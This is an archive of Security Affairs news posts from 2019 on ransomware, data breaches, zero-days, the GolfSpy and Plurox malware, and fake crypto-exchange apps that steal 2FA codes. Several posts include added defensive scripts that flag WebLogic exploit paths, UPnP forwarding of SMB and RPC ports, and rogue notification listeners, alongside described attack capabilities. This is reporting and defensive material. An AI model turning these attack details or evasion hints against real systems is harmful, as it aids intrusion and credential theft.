Category Archives: Security Affairs

The Riviera Beach City pays $600,000 in ransom

The Riviera Beach City, Florida, agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system.

The Riviera Beach City Council voted unanimously to pay $600,000 in ransom to decrypt its records after a ransomware attack hit its systems. The council had previously agreed to spend $941,000 to modernize the entire IT infrastructure after hackers broke into the city’s system three weeks ago, encrypting data managed by the City.

The internal IT staff has been working with security consultants to restore operations, but according to the consultants the only way to decrypt the data was to pay the ransom.

“The Riviera Beach City Council voted unanimously this week to pay the hackers’ demands, believing the Palm Beach suburb had no choice if it wanted to retrieve its records, which the hackers encrypted.” reported the Associated Press. “Spokeswoman Rose Anne Brown said Wednesday that the city of 35,000 residents has been working with outside security consultants, who recommended the ransom be paid.”

The attack began on May 29, when an employee at the Riviera Beach police department opened a malicious email and clicked a link that infected the PC.

The ransomware rapidly spread inside the Riviera Beach City infrastructure, causing several problems: the email system was disabled, employees and vendors were paid by check rather than by direct deposit, communications went down, and 911 dispatchers were unable to accept calls, although the service continued to operate.

Initially, the city council decided not to pay the ransom, but given the difficulties in restoring operations, it opted to pay.

On Monday, city officials in a brief meeting unanimously voted to use the city’s insurance to pay a ransom of 65 bitcoins (~$603,000).

“The payment is being covered by insurance.” continues the AP. “The FBI on its website says it “doesn’t support” paying off hackers, but Riviera Beach isn’t alone: many government agencies and businesses do.”

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

“The FBI had no comment Wednesday on the Riviera Beach attack, but said 1,493 ransomware attacks were reported last year with victims paying $3.6 million to hackers — about $2,400 per attack. Some of those were against individuals.” concludes the AP.

Pierluigi Paganini

(SecurityAffairs – Riviera Beach City, hacking)

The post The Riviera Beach City pays $600,000 in ransom appeared first on Security Affairs.

Oregon Department of Human Services data breach impacted 645,000 clients

Oregon Department of Human Services announced it was the victim of a data breach in January, with roughly 645,000 clients potentially impacted.

Oregon Department of Human Services officials confirmed that the organization has suffered a data breach that has exposed personal details and health information of 645,000 clients.

The incident happened in January, and the Oregon Department of Human Services is now notifying the affected clients.

“The Oregon Department of Human Services is notifying about 645,000 clients whose personal information is now at risk from a January data breach. State officials announced the notifications on Tuesday. They’ll start mailing them on Wednesday.” states the Statesman-Journal.

“Affected people were enrolled in the department’s welfare and children services programs at the time of the breach. Officials said the compromised data includes personal health information, but it’s unknown if it was viewed or inappropriately used.”

Individuals impacted by the data breach were enrolled in the department’s welfare and children services programs at the time of the security incident.

“The state is also providing 12 months of identity theft monitoring and recovery services, which includes a $1 million insurance reimbursement policy to impacted individuals.” reads the Associated Press.

The department was hit by a phishing campaign on January 8, 2019, and at least nine employees were deceived in the attack.

“The breach happened during an email “phishing” attempt that targeted the department Jan. 8. Nine employees opened the email and clicked on a link that gave the perpetrator access to their email accounts.” concludes the AP.

Pierluigi Paganini

(SecurityAffairs – Oregon Department of Human Services, hacking)

Tor Browser 8.5.2 fixes Firefox zero-day. Update it now!

Developers at the Tor Project have released the Tor Browser 8.5.2 to address the recently fixed CVE-2019-11707 zero-day flaw in Mozilla Firefox.

Yesterday I reported the news of a critical zero-day in Firefox that was addressed by Mozilla with a new release. The vulnerability, tracked as CVE-2019-11707, is a type confusion flaw in Array.pop. Mozilla has addressed it with the release of Firefox 67.0.3 and Firefox ESR 60.7.1.

The flaw was reported by Coinbase Security and Samuel Groß of Google’s Project Zero team. Samuel Groß explained that he reported the bug to Mozilla on April 15, 2019.

The researcher explained that the vulnerability could be used for remote code execution if chained with a separate sandbox escape issue.

Developers at the Tor Project have released the Tor Browser 8.5.2 to address the CVE-2019-11707 vulnerability too. It is very important for Tor users to use the updated version of the Tor Browser to protect their anonymity.

This vulnerability did not affect users running under the Safer or Safest security levels.

“This release fixes a critical security update in Firefox. In addition, we update NoScript to 10.6.3, fixing a few issues.” reads the announcement of the Tor Project. “Users of the safer and safest security levels were not affected by this security issue.”

Users can manually check the availability of new updates by going to the Tor Browser menu -> Help -> About Tor Browser.

Mozilla confirmed that threat actors exploited the zero-day in targeted attacks in the wild, but the organization did not provide technical details of the issue.

The DHS’s Cybersecurity and Infrastructure Security Agency (CISA) also issued a short alert for the vulnerability in Mozilla.

The Tor Browser 8.5.2 also includes an updated version of the NoScript addon (version 10.6.3).

Bad news for Android users: the update for the Android version of the browser will not be available until the weekend; in the meantime, Android users should use the browser at the Safer or Safest security level.

“As part of our team is currently traveling to an event, we are unable to access our Android signing token, therefore the Android release is not yet available. We expect to be able to publish the Android release this weekend.” continues the announcement.

The Tor Browser 8.5.2 can be downloaded from the Tor Browser download page and from the distribution directory.

Below the full changelog for the new version:

Tor Browser 8.5.2 -- June 19 2019
 * All platforms
   * Pick up fix for Mozilla's bug 1544386
   * Update NoScript to 10.6.3
     * Bug 29904: NoScript blocks MP4 on higher security levels
     * Bug 30624+29043+29647: Prevent XSS protection from freezing the browser

Pierluigi Paganini

(SecurityAffairs – Tor, zero-day)

Bouncing Golf cyberespionage campaign targets Android users in Middle East

According to security researchers at Trend Micro, a cyberespionage campaign is targeting Android users in Middle Eastern countries.

Security researchers at Trend Micro have spotted a cyberespionage campaign, dubbed ‘Bouncing Golf’, that is targeting Android users in Middle Eastern countries.

Threat actors are using a piece of malware detected as GolfSpy, which implements multiple features and can hijack the victim’s device.

GolfSpy could steal the following information:

  • Device accounts
  • List of applications installed in the device
  • Device’s current running processes
  • Battery status
  • Bookmarks/Histories of the device’s default browser
  • Call logs and records
  • Clipboard contents
  • Contacts, including those in VCard format
  • Mobile operator information
  • Files stored on SDcard
  • Device location
  • List of image, audio, and video files stored on the device
  • Storage and memory information
  • Connection information
  • Sensor information
  • SMS messages
  • Pictures

Attackers distributed the malware in tainted legitimate applications that are hosted on websites advertised on social media. The tainted applications pose as communication, news, lifestyle, book, and reference apps that are commonly used in the Middle East.

“We uncovered a cyberespionage campaign targeting Middle Eastern countries. We named this campaign “Bouncing Golf” based on the malware’s code in the package named “golf.”” reads the blog post published by Trend Micro. “The malware involved, which Trend Micro detects as AndroidOS_GolfSpy.HRX, is notable for its wide range of cyberespionage capabilities. Malicious codes are embedded in apps that the operators repackaged from legitimate applications.”

According to the experts that have analyzed the command and control (C&C) servers used in the Bouncing Golf campaign, more than 660 Android devices have been infected with GolfSpy malware. The attackers appear to be focused on stealing military-related information.

The researchers speculate on a possible connection to Domestic Kitten espionage activities, an extensive surveillance operation conducted by an Iranian APT actor and aimed at specific groups of individuals since 2016.

Experts found similarities in the structure of code strings and in the format of the data targeted for theft.

The GolfSpy malware is also able to connect to a remote server to fetch and perform a broad range of commands such as searching for/listing/deleting/renaming files, downloading/uploading files to/from the device, taking screenshots, installing application packages (APK), recording audio and video, and updating the malware.

Once the malware is executed, it generates a unique ID and then collects targeted data and writes it to a file on the mobile device.

The malicious code allows the attackers to choose the data types to collect. Stolen data is encrypted using a simple XOR operation with a pre-configured key and then sent to the C2 via HTTP POST requests.

GolfSpy also connects to the C2 via a socket in order to receive additional commands. In this case, stolen data is likewise sent to the C2 in encrypted form via the socket; experts pointed out that the encryption key is different from the one used when data is sent via HTTP.

The operators behind the Bouncing Golf campaign attempt to cover their tracks, for example, they masked the registrant contact details of the C&C domains used in the campaign. The IP addresses associated with the C&C servers used in the campaign also appear to be located in many European countries, including Russia, France, Holland, and Germany.

“As we’ve seen in last year’s mobile threat landscape, we expect more cyberespionage campaigns targeting the mobile platform given its ubiquity, employing tried-and-tested techniques to lure unwitting users.” Trend Micro concludes. “The extent of information that these kinds of threats can steal is also significant, as it lets attackers virtually take over a compromised device.”

Pierluigi Paganini

(SecurityAffairs – Bouncing Golf, hacking)

AMCA files for bankruptcy following the recently disclosed security breach

Retrieval-Masters Creditors Bureau, the company that operates healthcare billing services provider AMCA, has filed for Chapter 11 bankruptcy due to a recent data breach.

Retrieval-Masters Creditors Bureau, the company that operates the recovery agency for patient collections American Medical Collection Agency (AMCA), has filed for Chapter 11 bankruptcy due to a recent security breach that affected millions of individuals.

Retrieval-Masters Creditors Bureau would have to pay millions of dollars for the incident response; for this reason, it has decided to terminate AMCA.

The news is disconcerting and demonstrates the potential effects of a data breach on an organization.

The incident impacted millions of users; a filing by Quest Diagnostics with the U.S. Securities and Exchange Commission (SEC) revealed that the attackers broke into the web payment portal of the American Medical Collection Agency between August 1, 2018 and March 30, 2019.

AMCA provides services to numerous firms, including the revenue cycle management provider Optum360, medical testing firm Quest Diagnostics, and LabCorp.

The security breach has impacted roughly 12 million Quest Diagnostics patients and roughly 7.7 million LabCorp patients. After the disclosure of the incident, LabCorp announced the termination of business activities with AMCA, and Quest Diagnostics suspended sending collection requests to AMCA.

The hackers broke into company databases containing millions of medical test lab patients’ personal and payment information.

Another 422,000 patients of BioReference Laboratories, roughly 500,000 patients of CareCentrix, and customers of Sunrise Laboratories were also impacted by the security breach.

AMCA is in the eye of the storm: several class action lawsuits have been filed against it, and the number of potentially affected people continues to grow.

According to documents submitted to the U.S. Bankruptcy Court in the Southern District of New York, many payment cards used on the AMCA web site had been used for fraudulent charges.

The investigation into the incident has cost AMCA roughly $400,000 and it has been estimated that the company will spend another $3.8 million to send millions of notices to impacted individuals.

Pierluigi Paganini

(SecurityAffairs – AMCA, hacking)

Another Remote Code Execution flaw in WebLogic exploited in the wild

Oracle released emergency patches for another critical remote code execution vulnerability affecting WebLogic Server.

On Tuesday, Oracle released emergency patches for another critical remote code execution vulnerability affecting the WebLogic Server.

The vulnerability, tracked as CVE-2019-2729, affects WebLogic versions 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. The vulnerability is a remotely exploitable deserialization vulnerability via XMLDecoder in Oracle WebLogic Server Web Services, it received a CVSS score of 9.8.

A remote attacker could exploit the CVE-2019-2729 flaw without authentication. The issue was independently reported to Oracle by many security researchers.

“This Security Alert addresses CVE-2019-2729, a deserialization vulnerability via XMLDecoder in Oracle WebLogic Server Web Services. This remote code execution vulnerability is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password.” reads the security advisory published by Oracle.

“Due to the severity of this vulnerability, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible.”

Oracle urges its users to apply the necessary patches and also the latest Critical Patch Update (CPU).

John Heimann, VP of Security Program Management at Oracle, pointed out that CVE-2019-2729 is distinct from the recently discovered CVE-2019-2725, which was exploited in cryptojacking campaigns and in hacking campaigns spreading the Sodinokibi ransomware.

“Please note that while the issue addressed by this alert is a deserialization vulnerability, like that addressed in Security Alert CVE-2019-2725, it is a distinct vulnerability.” wrote Heimann.

“Due to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible.”

According to the experts at Knownsec 404 Team, who also reported the flaw, CVE-2019-2729 is actually the result of an incomplete patch for CVE-2019-2725. Knownsec 404 Team confirmed that threat actors are already exploiting CVE-2019-2729 in the wild.

“Then today, a new oracle webLogic deserialization RCE 0day vulnerability was found and is being actively used in the wild. We analyzed and reproduced the 0day vulnerability, which is based on and bypasses the patch for CVE-2019-2725.” reads a post published by Knownsec 404 Team.

Knownsec 404 Team provided the following temporary solutions:

  • Scenario 1: Find and delete wls9_async_response.war and wls-wsat.war, then restart the WebLogic service.
  • Scenario 2: Control URL access to the /_async/* and /wls-wsat/* paths through an access policy.
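As an added illustration of the second workaround (example code written for this page, not Knownsec’s or Oracle’s), the Python script below normalises request paths before matching them against the /_async/ and /wls-wsat/ prefixes, so that percent-encoding, doubled slashes and dot segments cannot slip past the rule, and then scans constructed access-log lines for requests that reached those paths. The log format and the sample lines are assumptions.

```python
import posixpath
import re
from typing import Dict, List
from urllib.parse import unquote, urlsplit

# Request path prefixes named in the Knownsec 404 Team workaround for
# CVE-2019-2729: "control URL access for /_async/* and /wls-wsat/*".
RESTRICTED_PREFIXES = ("/_async/", "/wls-wsat/")

# Minimal pattern for common/combined access-log lines (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize_path(target: str) -> str:
    """Canonicalise a request target so percent-encoding, doubled slashes
    and dot segments cannot slip past a simple prefix rule."""
    path = urlsplit(target).path or "/"    # drop query string and fragment
    path = unquote(path)                    # e.g. %5F -> _
    path = re.sub(r"/+", "/", path)         # '//' -> '/'
    path = posixpath.normpath(path)         # resolve '.' and '..'
    if not path.startswith("/"):
        path = "/" + path
    return path.lower()                     # conservative, case-insensitive match


def is_restricted(target: str) -> bool:
    """True if the temporary access policy should deny this request."""
    path = normalize_path(target)
    for prefix in RESTRICTED_PREFIXES:
        # normpath strips a trailing slash, so '/_async/' becomes '/_async'
        if path == prefix.rstrip("/") or path.startswith(prefix):
            return True
    return False


def scan_access_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per logged request that reached a restricted path."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue   # not an access-log line; ignore it
        if is_restricted(m.group("target")):
            hits.append({k: m.group(k) for k in ("ip", "ts", "method", "target", "status")})
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Jun/2019:10:01:02 +0000] "POST /_async/AsyncResponseService HTTP/1.1" 202 0',
    '203.0.113.7 - - [19/Jun/2019:10:01:05 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1201',
    '198.51.100.4 - - [19/Jun/2019:10:02:00 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3411',
    '203.0.113.9 - - [19/Jun/2019:10:03:14 +0000] "POST /foo/..//%5Fasync/AsyncResponseService?x=1 HTTP/1.1" 202 0',
    '198.51.100.4 - - [19/Jun/2019:10:04:30 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["method"]} {hit["target"]} -> {hit["status"]}')
```

The fourth sample line shows why the path must be canonicalised before the prefix check: without decoding and normalisation it would not match either restricted prefix.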

Pierluigi Paganini

(SecurityAffairs – CVE-2019-2729, hacking)

Mozilla fixed a Firefox Zero-Day flaw exploited in targeted attacks

Mozilla released security updates for Firefox that addressed a critical zero-day vulnerability exploited in targeted attacks in the wild.

Mozilla released security updates for its Firefox web browser that address a critical vulnerability that has been actively exploited in the wild.

The zero-day vulnerability, tracked as CVE-2019-11707, is a type confusion flaw in Array.pop. Mozilla has addressed it with the release of Firefox 67.0.3 and Firefox ESR 60.7.1.

“A type confusion vulnerability can occur when manipulating JavaScript objects due to issues in Array.pop. This can allow for an exploitable crash. We are aware of targeted attacks in the wild abusing this flaw.” reads the security advisory published by Mozilla.

The flaw was reported by Coinbase Security and Samuel Groß of Google’s Project Zero team. Samuel Groß explained that he reported the bug to Mozilla on April 15, 2019.

The researcher explained that the vulnerability could be used for remote code execution if chained with a separate sandbox escape issue.

Mozilla confirmed that threat actors exploited the zero-day in targeted attacks in the wild, but the organization did not provide technical details of the issue.

The DHS’s Cybersecurity and Infrastructure Security Agency (CISA) also issued a short alert for the vulnerability in Mozilla.

“Mozilla has released security updates to address a vulnerability in Firefox and Firefox ESR. An attacker could exploit this vulnerability to take control of an affected system.” states the alert. “This vulnerability was detected in exploits in the wild.”

In 2016, security researchers found a malicious script that exploited another Firefox Zero-day to identify some users of the Tor anonymity network.

Pierluigi Paganini

(SecurityAffairs – Mozilla Firefox zero-day, hacking)

Eatstreet, the online food ordering service disclosed a security breach

EatStreet, the online food ordering service, disclosed a security breach that exposed customer payment card data and details of its partners.

EatStreet, an online and mobile food ordering service, disclosed a security breach that exposed customer payment card data and details of its delivery and restaurant partners.

Attackers breached the company network on May 3 and stole data from its database. On May 17, the company discovered the intrusion and locked out the attacker.

Stolen data includes names, addresses, phone numbers, and email addresses, as well as financial data (i.e., bank accounts, routing numbers, credit card numbers, expiration dates, and card verification codes) and billing addresses.

“On May 3, 2019, an unauthorized third party gained access to our database, which we discovered on May 17, 2019. The unauthorized third party was able to acquire information that was in our database on May 3, 2019. We were able, however, to promptly terminate the unauthorized access to our systems when we discovered the incident.” reads the data breach notification letter sent to delivery and restaurant partners.

EatStreet currently offers its services to “over 15,000 restaurants in more than 1,100 cities,” the company’s Android app has over 100,000 installs as of June 5.

EatStreet promptly alerted the credit card payment processors and “hired a leading external IT forensics firm to respond to and investigate the incident. We audited our systems to validate that there was no other unauthorized access.”

At the time of writing, law enforcement agencies were not investigating the incident:

“EatStreet continues to work with outside experts to identify other measures it can take to improve its security controls. While our investigation is ongoing, there was no law enforcement investigation that delayed notification to you.”

“In addition, we have enhanced the security of our systems, including reinforcing multi-factor authentication, rotating credential keys and reviewing and updating coding practices.”

According to ZDNet, the hacker who breached the company is Gnosticplayers, who made the headlines between February and April by disclosing, in five rounds, the existence of several massive unreported data breaches. The list of victims includes Canva, 500px, UnderArmor, ShareThis, GfyCat, Ge.tt, Evite, and others.

The hacker took credit for the data breach while discussing the Canva hack allegations with ZDNet last month.

The extent of the security breach is not yet clear, but the hacker claimed he stole over six million user records.

“In an email to ZDNet today, the hacker claimed he was in the possession of over six million user records he took from the company’s servers. Over the past few months, this hacker has stolen and put up for sale 1,071 billion user credentials from 45 companies.”

Pierluigi Paganini

(SecurityAffairs – EatStreet, hacking)

Modular Plurox backdoor can spread over local network

Kaspersky experts recently discovered a backdoor dubbed Plurox that can spread itself over a local network and allows installing additional malware.

Kaspersky experts discovered the Plurox backdoor in February, it can spread itself over a local network and could be used by attackers to install additional malware. 

The Plurox backdoor is written in C and compiled with Mingw GCC, and it communicates with the command and control (C&C) server using the TCP protocol. The malware has a modular structure: it uses a variety of plugins to implement its functionalities.

“The analysis showed the malware to have a few quite unpleasant features. It can spread itself over a local network via an exploit, provide access to the attacked network, and install miners and other malicious software on victim computers.” reads the analysis published by Kaspersky. “What’s more, the backdoor is modular, which means that its functionality can be expanded with the aid of plugins, as required. Post-analysis, the malware was named Backdoor.Win32.Plurox.”

The analysis of the code revealed the presence of debug lines, a circumstance that suggests the malware was at the testing stage when it was first spotted.

The Plurox backdoor uses two different ports to load plugins, the ports along with the C&C addresses are hardcoded into the source code of the malware. 

Monitoring the backdoor’s activity, experts discovered two “subnets.” One subnet is used to provide only miners (auto_proc, auto_cuda, auto_gpu_nvidia modules) to the Plurox backdoor. The other one, besides miners (auto_opencl_amd, auto_miner), is used to pass several plugins to the malware.

The Plurox backdoor supports the following commands:

  • Download and run files using WinAPI CreateProcess
  • Update bot
  • Delete and stop (delete own service, remove from autoload, delete files, remove artifacts from registry)
  • Download and run plugin
  • Stop plugin
  • Update plugin (stop process and delete file of old version, load and start new one)
  • Stop and delete plugin

The backdoor allows delivering the proper cryptocurrency miners depending on the system configuration.  

The researchers observed eight mining modules that were used to infect systems running on different processors: auto_proc, auto_cuda, auto_miner, auto_opencl_amd, auto_gpu_intel, auto_gpu_nvidia, auto_gpu_cuda, and auto_gpu_amd. 

Experts also discovered that the Plurox backdoor supports a UPnP plugin designed to target a local network.

“The module receives from the C&C a subnet with mask /24, retrieves all IP addresses from it, and attempts to forward ports 135 (MS-RPC) and 445 (SMB) for the currently selected IP address on the router using the UPnP protocol. If successful, it reports the result to the C&C center, waits for 300 seconds (5 minutes), and then deletes the forwarded ports. We assume that this plugin can be used to attack a local network. ” states the report.

If administrators detect the attack on a host, they will see it coming from the router rather than from a local machine.

The UPnP plugin is similar to the EternalSilence exploit, with the difference that Plurox forwards TCP port 135 instead of 139. 
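An added example, not from Kaspersky’s report: a Python check that audits a router’s UPnP port-mapping table for the 135/445 forwardings described above (139 is included because of the EternalSilence comparison). The entries are constructed to mirror the argument names of the IGD WANIPConnection action GetGenericPortMappingEntry; fetching them from a real router is assumed to be done separately.

```python
from typing import Dict, List, Set

# Internal TCP ports whose forwarding the write-up ties to lateral movement:
# 135 (MS-RPC) and 445 (SMB) for Plurox, 139 for EternalSilence.
WATCHED_PORTS = {135, 139, 445}

# Constructed sample of IGD port-mapping entries (not from a real router).
SAMPLE_MAPPINGS = [
    {"NewExternalPort": "8080", "NewProtocol": "TCP", "NewInternalPort": "8080",
     "NewInternalClient": "192.168.1.20", "NewEnabled": "1",
     "NewPortMappingDescription": "Media server", "NewLeaseDuration": "0"},
    {"NewExternalPort": "47231", "NewProtocol": "TCP", "NewInternalPort": "445",
     "NewInternalClient": "192.168.1.37", "NewEnabled": "1",
     "NewPortMappingDescription": "", "NewLeaseDuration": "0"},
    {"NewExternalPort": "47232", "NewProtocol": "TCP", "NewInternalPort": "135",
     "NewInternalClient": "192.168.1.37", "NewEnabled": "1",
     "NewPortMappingDescription": "", "NewLeaseDuration": "0"},
    {"NewExternalPort": "5000", "NewProtocol": "UDP", "NewInternalPort": "445",
     "NewInternalClient": "192.168.1.50", "NewEnabled": "0",
     "NewPortMappingDescription": "disabled", "NewLeaseDuration": "0"},
]


def suspicious_mappings(entries: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return enabled TCP mappings that expose a watched internal port to the WAN."""
    flagged = []
    for e in entries:
        try:
            internal = int(e["NewInternalPort"])
            external = int(e["NewExternalPort"])
        except (KeyError, ValueError):
            continue  # malformed entry: skip it rather than abort the sweep
        if e.get("NewEnabled", "1") != "1":
            continue  # disabled mappings do not forward traffic
        if e.get("NewProtocol", "").upper() != "TCP":
            continue  # MS-RPC and SMB are TCP services
        if internal in WATCHED_PORTS:
            flagged.append({
                "client": e.get("NewInternalClient", "?"),
                "internal_port": internal,
                "external_port": external,
                "description": e.get("NewPortMappingDescription", ""),
            })
    return flagged


def hosts_with_both_ports(flagged: List[Dict[str, object]]) -> List[str]:
    """Hosts that have both 135 and 445 forwarded, the pair the UPnP plugin creates."""
    by_host: Dict[str, Set[int]] = {}
    for f in flagged:
        by_host.setdefault(str(f["client"]), set()).add(int(f["internal_port"]))
    return sorted(host for host, ports in by_host.items() if {135, 445} <= ports)


if __name__ == "__main__":
    found = suspicious_mappings(SAMPLE_MAPPINGS)
    for f in found:
        print(f'{f["client"]}:{f["internal_port"]} exposed on external port {f["external_port"]}')
    print("hosts with 135+445 forwarded:", hosts_with_both_ports(found))
```

Because the plugin removes its forwardings after 300 seconds, a periodic sweep must run at a shorter interval to have a chance of catching them.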

The backdoor uses the SMB plugin for spreading over the network using the EternalBlue exploit.

This module borrows code from the Trickster Trojan, so the researchers believe that the authors of Plurox and Trickster may be linked.

Further technical details, including IoCs are reported in the analysis published by Kaspersky.

Pierluigi Paganini

(SecurityAffairs – XSS, hacking)

Yana Peel, chief executive of London’s Galleries, resigned after discovery of her links with NSO group

The head of London’s Serpentine Galleries resigned on Tuesday following a Guardian report about her links to the Israeli surveillance firm NSO Group.

On Tuesday, the chief executive of London’s Serpentine Galleries, Yana Peel, resigned following a Guardian report about her links to the Israeli surveillance firm NSO Group.

According to the newspaper, Yana Peel is the co-owner of the controversial Israeli company. The board of trustees of the galleries has accepted Peel’s resignation.

“The head of the Serpentine Galleries has resigned after the Guardian revealed she is the co-owner of an Israeli cyberweapons company whose software has allegedly been used by authoritarian regimes to spy on dissidents.” reads the post published by the Guardian.

“On Tuesday, Yana Peel announced she was stepping down as the chief executive of the prestigious London art gallery so the work of the Serpentine would not be undermined by what she called “misguided personal attacks on me and my family”.”

Last week, the Guardian revealed that Yana Peel is one of the owners of the private equity firm Novalpina Capital, co-founded by Peel’s husband, Stephen, that has the majority of the shares in NSO Group.

“I have decided I am better able to continue my work in supporting the arts, the advancement of human rights and freedom of expression by moving away from my current role.” Peel said.

The principal product of the NSO Group is a surveillance software called Pegasus, which allows spying on the most common mobile devices, including iPhones, Androids, BlackBerry and Symbian systems.

Pegasus is a perfect tool for surveillance: it is able to steal any kind of data from smartphones and to use the devices to spy on the surrounding environment through their camera and microphone.

The NSO Group operated in the dark for several years, until researchers from the Citizen Lab organization and the Lookout firm spotted its software in targeted attacks against the UAE human rights defender Ahmed Mansoor.

The researchers also spotted other attacks against a Mexican journalist who had reported on corruption in the Mexican government.

NSO replied that its surveillance solution was “intended to be used exclusively for the investigation and prevention of crime and terrorism.”

People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors the sales and potential customers verifying that the software will not be abused to violate human rights.

Officially the sale of surveillance software is limited to authorized governments to support investigations of agencies on criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

The traces collected by Amnesty International were corroborated by the findings of the investigation conducted by researchers at the internet watchdog Citizen Lab.

Citizen Lab collected evidence of attacks against 175 targets worldwide carried out with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar and Saudi Arabia, where the Israeli surveillance software is becoming very popular.

“The work of the Serpentine – and its incomparable artistic director – cannot be allowed to be undermined by misguided personal attacks on me and my family. These attacks are based upon inaccurate media reports now subject to legal complaints.” Peel said. “I have decided I am better able to continue my work in supporting the arts, the advancement of human rights and freedom of expression by moving away from my current role,” she continued.

Pierluigi Paganini

(SecurityAffairs – NSO group, Surveillance)

Android apps use a novel technique to bypass 2FA and steal Bitcoin

An expert discovered a new technique for bypassing SMS-based two-factor authentication while circumventing Google’s recent SMS permission restrictions.

The popular security expert Lukas Stefanko from ESET discovered some apps (named BTCTurk Pro Beta and BtcTurk Pro Beta) impersonating the Turkish cryptocurrency exchange BtcTurk in an attempt to steal login credentials.

In order to steal the 2FA OTPs, the apps read the one-time codes that appear in the 2FA notifications from the service, rather than intercepting the SMS messages that deliver them.

Stefanko noted that the renewed interest in Bitcoin goes along with the growth of its price.

“When Google restricted the use of SMS and Call Log permissions in Android apps in March 2019, one of the positive effects was that credential-stealing apps lost the option to abuse these permissions for bypassing SMS-based two-factor authentication (2FA) mechanisms.” wrote the expert.

“We have now discovered malicious apps capable of accessing one-time passwords (OTPs) in SMS 2FA messages without using SMS permissions, circumventing Google’s recent restrictions.”

When the apps are executed for the first time they request the ‘notification access’ permission, which allows them to read the notifications displayed by other apps installed on the device, dismiss those notifications, or click buttons they contain.

Once the permission is granted, the apps display a fake login form asking for the user’s BtcTurk login credentials. Once the user provides the credentials, the apps display a false error message.

“Opss! Due to the change made in the SMS Verification system, we are temporarily unable to service our mobile application. After the maintenance work, you will be notified via the application. Thank you for your understanding.” reads the message (Translated from Turkish).

In the meantime, the login credentials for the services are sent back to the attacker’s server. 

At this point, the rogue apps leverage the notification access permission to read all incoming notifications and select the ones related to applications of interest: notifications from apps whose names contain the keywords gm, yandex, mail, k9, outlook, SMS and messaging. These notifications are sent to the attacker, who selects the ones containing the one-time passwords used for 2FA.

“The displayed content of all notifications from the targeted apps is sent to the attacker’s server. The content can be accessed by the attackers regardless of the settings the victim uses for displaying notifications on the lock screen. The attackers behind this app can also dismiss incoming notifications and set the device’s ringer mode to silent, which can prevent victims from noticing fraudulent transactions happening.” continues the expert.

At this point it is easy for the attackers to impersonate the victims when accessing the services: any 2FA OTP can be dismissed on the victim’s phone and forwarded to the attacker, who then holds both the login credentials and the OTP and can use them to access the account.
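The whole scheme hinges on one permission. A defender can therefore audit which packages hold notification access on a device and flag anything outside an allowlist. The script below is an added example written for this article, not code from ESET or from the apps described; on a real device the raw value it parses comes from `adb shell settings get secure enabled_notification_listeners`, a colon-separated list of `package/ListenerClass` entries. The allowlist and the sample value (including the package name `com.example.btcturkpro`) are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the article or ESET): audit which apps hold
# "notification access" on an Android device, the permission the fake
# BtcTurk apps abuse to read 2FA notifications.
#
# On a real device obtain the raw value with:
#   adb shell settings get secure enabled_notification_listeners
# It is a colon-separated list of ComponentName entries, i.e.
# <package>/<listener class>. Every function below works on that string.

# Packages you expect to hold the permission (assumption: adjust to your
# own fleet). Space separated.
ALLOWED_LISTENERS="com.android.systemui com.google.android.wearable.app"

# list_listener_packages RAW
# Prints one package name per line, taken from the ComponentName list.
list_listener_packages() {
    printf '%s\n' "$1" | tr ':' '\n' | sed -n 's#^\([^/]*\)/.*#\1#p'
}

# unexpected_listeners RAW
# Prints the packages with notification access that are NOT allowlisted.
unexpected_listeners() {
    list_listener_packages "$1" | while IFS= read -r pkg; do
        case " $ALLOWED_LISTENERS " in
            *" $pkg "*) ;;                # known listener, skip it
            *) printf '%s\n' "$pkg" ;;    # unknown listener, flag it
        esac
    done
}

# Constructed sample value (NOT captured from a real device): the system UI
# listener plus a look-alike wallet app that registered its own listener.
SAMPLE='com.android.systemui/com.android.systemui.statusbar.NotificationListener:com.example.btcturkpro/com.example.btcturkpro.NotifService'

# audit_sample
# Prints a verdict for SAMPLE and returns 1 when an unexpected listener exists.
audit_sample() {
    found=$(unexpected_listeners "$SAMPLE")
    if [ -n "$found" ]; then
        echo "Unexpected notification listeners:"
        echo "$found"
        return 1
    fi
    echo "Only allowlisted apps hold notification access."
    return 0
}
```

In a fleet check, replace `SAMPLE` with the output of the `adb` command above (or of a device-management API that exposes the same setting) and treat a non-zero exit from `audit_sample` as a finding; a wallet or exchange app has no legitimate need to read other apps’ notifications.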

Experts at ESET are warning of the rapid spread of this technique that was recently observed in attacks against users of the Turkish Koineks exchange. ESET believes that the threat actor behind the attacks was the same.

“Just last week, we analyzed a malicious app impersonating the Turkish cryptocurrency exchange Koineks (kudos to @DjoNn35 for bringing that app to our attention). It is of interest that the fake Koineks app uses the same malicious technique to bypass SMS and email-based 2FA but lacks the ability to dismiss and silence notifications.”

“According to our analysis, it was created by the same attacker as the “BTCTurk Pro Beta” app analyzed in this blogpost. This shows that attackers are currently working on tuning this technique to achieve the “next best” results to stealing SMS messages.”

Experts believe that crooks will start using this technique against targets in other industries, including banks and financial institutions.

Pierluigi Paganini

(SecurityAffairs – SFA, hacking)


Expert found a critical RCE zero-day in TP-Link Wi-Fi Extenders

